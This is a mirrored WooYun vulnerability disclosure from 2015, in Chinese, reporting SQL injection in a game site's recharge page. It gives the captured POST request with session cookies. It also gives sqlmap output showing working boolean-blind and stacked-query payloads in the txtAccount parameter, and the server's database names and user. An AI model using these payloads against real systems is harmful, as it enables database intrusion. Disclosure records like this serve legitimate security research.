乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-21: 细节已通知厂商并且等待厂商处理中 2015-11-26: 厂商已经主动忽略漏洞,细节向公众公开
POST /recharge/chk_recharge.asp HTTP/1.1Content-Length: 154Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.91zjd.com:80/Cookie: ASP.NET_SessionId=xu20vw55qo1ukvfn4gui5355; Hm_lvt_d5924889d984deffd476e1699e74ce59=1447908911; Hm_lpvt_d5924889d984deffd476e1699e74ce59=1447908917; bdshare_firstime=1447908911317; CNZZDATA4818108=cnzz_eid%3D397960775-1447907265-http%253A%252F%252Fwww.91zjd.com%252F%26ntime%3D1447907265; ASPSESSIONIDCSSSACDA=NNPJOFHCBJACIPFMNLNJOAJF; U_TRS1=000000fb.c9bf6cd5.564d5195.18d150cb; U_TRS2=000000fb.c9c96cd5.564d5195.c23a8ef4; HAVAR=usrmdinst_12; HMACCOUNT=48E21975B7E46E73; BAIDUID=795DF8A618CF12AADFCC2C31E37A9BB8:FG=1; SINAGLOBAL=114.111.166.251_1447907736.24688; Apache=114.111.166.251_1447907736.24690Host: www.91zjd.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*rechargebut=%c1%a2%bc%b4%b3%e4%d6%b5&txtAccount=*&txtagainAccount=17&txtCardNum=4111111111111111&txtCardPwd=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: rechargebut=%c1%a2%bc%b4%b3%e4%d6%b5&txtAccount=' AND 2662=2662 AND 'rOUT'='rOUT&txtagainAccount=17&txtCardNum=4111111111111111&txtCardPwd=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: rechargebut=%c1%a2%bc%b4%b3%e4%d6%b5&txtAccount=';WAITFOR DELAY '0:0:5'--&txtagainAccount=17&txtCardNum=4111111111111111&txtCardPwd=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current database: 'QPGameUserDB'sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: rechargebut=%c1%a2%bc%b4%b3%e4%d6%b5&txtAccount=' AND 2662=2662 AND 'rOUT'='rOUT&txtagainAccount=17&txtCardNum=4111111111111111&txtCardPwd=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: rechargebut=%c1%a2%bc%b4%b3%e4%d6%b5&txtAccount=';WAITFOR DELAY '0:0:5'--&txtagainAccount=17&txtCardNum=4111111111111111&txtCardPwd=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current user: 'game_db_user'
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: rechargebut=%c1%a2%bc%b4%b3%e4%d6%b5&txtAccount=' AND 2662=2662 AND 'rOUT'='rOUT&txtagainAccount=17&txtCardNum=4111111111111111&txtCardPwd=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: rechargebut=%c1%a2%bc%b4%b3%e4%d6%b5&txtAccount=';WAITFOR DELAY '0:0:5'--&txtagainAccount=17&txtCardNum=4111111111111111&txtCardPwd=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [21]:[*] DB_BACKUP[*] master[*] model[*] msdb[*] QPGameBSTEST[*] QPGameDB[*] QPGameHFDB[*] QPGameJDDB[*] QPGameTYDB[*] QPGameUserDB[*] QPPromotionDB[*] QPServerInfoDB[*] QPServerInfoDB_NEW[*] QPTreasureDB[*] QPTreasureMatchDB[*] QPWebGameDB[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] ZJD_OM_DB[*] ZjdGameWebDB
参数过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-26 15:06
漏洞Rank:4 (WooYun评价)
暂无